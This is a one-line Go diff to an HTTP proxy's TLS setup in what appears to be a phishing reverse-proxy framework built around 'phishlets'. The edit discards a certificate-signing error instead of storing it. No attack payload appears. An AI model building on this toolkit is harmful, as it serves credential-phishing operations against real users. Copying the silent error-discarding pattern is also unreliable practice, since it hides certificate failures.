diff --git a/core/http_proxy.go b/core/http_proxy.go index df3e60a..9f61403 100644 --- a/core/http_proxy.go +++ b/core/http_proxy.go @@ -1106,7 +1106,7 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) ( } } else { // If hostname has no phishlet, generate self-signed certificate - cert, err = p.crt_db.SignCertificateForHost(hostname, "", port) + cert, _ = p.crt_db.SignCertificateForHost(hostname, "", port) } } if cert != nil {